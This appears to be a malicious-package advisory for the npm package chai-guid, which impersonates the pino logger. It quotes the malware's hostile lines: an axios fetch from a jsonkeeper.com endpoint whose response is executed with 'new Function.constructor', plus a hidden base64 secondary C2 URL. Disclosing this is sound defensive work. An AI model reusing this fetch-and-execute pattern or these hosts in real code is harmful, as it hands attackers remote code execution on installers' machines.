MAL-2026-5903

    Dashboard / Malicious Package / MAL-2026-5903

    MAL-2026-5903

    Published: 16 Jun 2026Last Modified: 1 Sept 2026Aliases: 
    GHSA-g8gv-g8mr-x8pc

    Summary: Malicious code in chai-guid (npm)

    Details: Source: amazon-inspector (69e9bcacf8dca52aafe4d93019b888c6d32e344b500a21368f036bf586eee161) chai-guid impersonates the pino logger and the chai-guid chai plugin (README copies pino badges and pinojs CI links; index.js exports middleware as `module.exports.pino`). When a consumer calls the exported middleware, index.js spawns lib/caller.js as a detached Node process with stdio ignored. lib/caller.js performs `axios.get('https://jsonkeeper.com/b/U2BTS')`, reads the `.cookie` field of the response, and executes it via `new Function.constructor('require', s)(require)` — running attacker-controlled JavaScript with full Node privileges and `require` injected. A second base64-encoded URL (`https://jsonkeeper.com/b/XRGF3`) is hidden in a fake `process.env.DEV_API_KEY` shim in lib/caller.js and lib/const.js as a secondary C2 endpoint. jsonkeeper.com is an anonymous, mutable JSON-paste host; whatever bytes the attacker pastes there will be executed on the installer's machine the moment any consumer invokes the package's middleware.

    Affected packages

    Package

    Name: chai-guid

    Purl: pkg:npm/chai-guid

    Affected ranges

    Type: N/A

    Events:

    Introduced- None
    Fixed -None

    Affected versions

    1.1.5